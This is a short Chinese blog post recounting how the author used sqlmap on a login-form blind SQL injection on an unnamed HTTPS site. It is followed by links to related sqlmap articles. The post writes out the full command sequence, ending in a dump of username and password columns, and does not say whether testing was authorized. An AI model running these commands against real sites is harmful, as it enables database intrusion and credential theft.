记一次sqlmap实战

最新推荐文章于 2024-06-25 09:11:48 发布
最新推荐文章于 2024-06-25 09:11:48 发布
阅读量4k 收藏 4
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43832694/article/details/122996786
版权

写给自己看

敏感数据已经打码处理

普普通通的一个站,在登录框发现盲注

手注了一下发现有64个表...一个个注要注到明年,上sqlmap!

python sqlmap.py -r C:\Users\admin\Desktop\post.txt

结果一直提示连不上...代理到burpsuite看看啥情况

python sqlmap.py -r C:\Users\admin\Desktop\post.txt -proxy http://127.0.0.1:8080

好嘛,这个站是https的,但是sqlmap一直在注http,目标也没开http自然无法访问

查了下大佬们的文章,需要加个--force-ssl参数就可以注https了

python sqlmap.py -r C:\Users\admin\Desktop\post.txt --force-ssl 

遇到新的问题,sqlmap检测到网站返回401就不继续注入了,推荐我用--ignore-code重新运行

又查了下,--ignore-code作用是忽略网站错误代码,食用方式为--ignore-code=401

python sqlmap.py -r C:\Users\admin\Desktop\post.txt --force-ssl --ignore-code=401

居然没成功,那就指定一下数据库吧,顺便指定一下注入点 

python sqlmap.py -r C:\Users\admin\Desktop\post.txt --force-ssl --ignore-code=401 --dbms=mysql -p username

 python sqlmap.py -r C:\Users\admin\Desktop\post.txt --force-ssl --ignore-code=401 --dbms=mysql -p username -D 123 -T 456 -C user_name,password --dump

 终于能注了,不过拿到的数据只是测试数据的样子,还加密了

好吧,虽然没拿到什么数据,不过这次也算是了解到两个sqlmap的参数,全当学习了

六六是个小白
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3009
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
神器SQLmap实战详解
Sgirll的博客
04-07 468
本文将以SQLMap工具为核心,深入探讨SQL注入的原理、检测、利用及防御策略,旨在为网络安全研究人员、渗透测试人员提供实用指南。通过学习和使用像SQLMap这样的工具,我们不仅能够更好地理解SQL注入的原理和攻击手法,还能够加强我们的应用程序和数据库的安全防护。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。SQLMap是一款开源的自动化SQL注入测试工具,它能够检测和利用Web应用中的SQL注入漏洞。
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
热门推荐
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
【网络安全渗透测试零基础入门必知必会】之SQLmap安装&实战(非常详细)零基础入门到精通,收藏这一篇就够了(4)
最新发布
Libra1313的博客
06-25 1130
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段SQLmap第四篇。本阶段主要讲解什么是SQLmap安装和实战案例。
sqlmap用法详解
hirak0的博客
09-07 1万+
输出详细等级 选项:-v 该选项用于设置输出信息的详细等级,共有七个级别。默认级别为 1,输出包括普通信息,警告,错误,关键信息和 Python 出错回遡信息(如果有的话)。 0:只输出 Python 出错回溯信息,错误和关键信息。 1:增加输出普通信息和警告信息。 2:增加输出调试信息。 3:增加输出已注入的 payloads。 4:增加输出 HTTP 请求。 5:增加输出 HTTP 响应头 6:增加输出 HTTP 响应内容。 使用等级 2 能更好地了解 sqlmap 内部实现了什么,特别是在检测阶段
Sqlmap基础用法
wang720521的博客
01-28 3775
SQLmap 用法 用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库
网络安全-sqlmap学习笔
关注网络安全、云原生安全
06-08 6366
介绍 检测和利用SQL注入的工具。 命令参数 参数解释 参数 含义 描述 -h,--help 帮助 显示基本帮助消息并退出 -hh 高级帮助 显示高级帮助消息并退出 --version 版本 显示程序的版本号并退出 -u,-url=URL URL 目标URL(例如“ http://www.site.com/vuln.php?id=1”) -d DIRECT 连接字符串,用于数据库直接连接 -l .
一次sqlmap
05-27
SQLMap是一款自动化的SQL注入工具,用于检测和利用SQL注入漏洞。它可以帮助安全研究人员或渗透测试人员快速识别网站是否存在SQL注入问题,并进一步获取数据库信息。在这个案例中,我们看到一个用户使用SQLMap来扫描...
SQLMAP使用实战测试
06-12
### SQLMap使用实战测试知识点详解 #### 一、SQLMap简介 SQLMap是一款开源的渗透测试工具,专门用于检测和利用Web应用程序中的SQL注入漏洞。它可以帮助安全研究人员和渗透测试人员自动化地发现并利用这些漏洞,进而...
一份SQLmap 使用手册小结(一)1
08-03
SQLmap是一款强大的自动化SQL注入工具,用于检测和利用SQL注入漏洞。以下是对SQLmap使用手册小结中的知识点的详细说明: 1. **注入点的检测**:SQLmap可以通过`-u`参数提供URL来自动检测是否存在SQL注入点。在描述...
第一节 Sqlmap介绍-01
09-15
Sqlmap 是一个开源的渗透测试工具,能够自动化检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问...
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助安全研究人员或渗透测试者发现并利用网站数据库的安全弱点。这个压缩包`sqlmapproject-sqlmap-1230e57`很可能包含了SQLmap的源...
sqlmap忽略500报错,继续注入
weixin_44400900的博客
08-24 2317
sqlmap忽略500报错,继续注入
sqlmap (六) http参数设置
hpx12345678的博客
10-06 1131
1)目的在访问需要HTTP认证的网站的时候,需要进行用户密码认证,我们直接探测会导致401错误;想要不登陆的情况下探测这个站点可以设置忽略401从而绕过继续探测;2)参数。
sqlmap自动扫描注入点_SQLmap指导手册
weixin_39532754的博客
11-22 2112
SQLmap指导手册一、前言sqlmap是一个开源的渗透测试工具,它自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行命令。二、特点全力支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Acce...
selenium 状态码521_sqlmap对状态码404处理的bug
weixin_29147045的博客
01-13 2423
Aboutsqlmap对页面遇到404响应码后直接抛出一个异常并退出sqlmap不再进行后续的paylaod测试,在用sqlmap测试sql注入点的时候,一般用到--batch参数来节省时间,这种情况下sqlmap有一处对http状态码404的处理不当导致无法测出注入点的bugDetail在爬虫时get请求的url可轻易爬到,但是post请求的url及post的数据的取得需要探测html中有没有表...
21、sqlmap参数详解
weixin_41489908的博客
12-12 528
sqlmap参数详解: Usage: python sqlmap.py [options] Options(选项): -h, --help Show basic help message and exit 展示帮助文档 参数 -hh Show advanced help message and exit 展示详细帮助文档 参数 –version Show program’s version num...
SQLMAP入门(二)——sqlmap_HTTP_参数设置
qq_45434762的博客
10-26 1361
1.SQLMAP设置HTTP方法 Sqlmap会自动在探测过程中使用适合的HTTP 请求方法。但是在某些情况下,需要强制使用具体的HTTP请求方法。例如PUT请求方法。HTTP PUT请求方法不会自动使用,因此需要强制指定。使用 –method=PUT 2.SQLMAP设置POST提交参数 默认情况下,用于执行HTTP请求的HTTP方法时GET,但是可以通过提供在POS...
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4722
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值